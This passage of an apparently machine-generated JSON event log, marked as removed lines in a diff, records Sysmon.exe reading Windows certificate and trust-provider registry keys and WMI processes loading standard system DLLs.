"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - 
"image_name": "ktmw32.dll", - "image_path": "C:\\Windows\\System32\\ktmw32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "resutils.dll", - "image_path": "C:\\Windows\\System32\\resutils.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 
131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "resutils.dll", - "image_path": "C:\\Windows\\System32\\resutils.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 
131883573481670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "wbemcomn.dll", - "image_path": "C:\\Windows\\System32\\wbemcomn.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": 
"C:\\Windows\\System32\\bcrypt.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", - "registry_value": "CIMOM", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", - "registry_value": "CIMOM", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 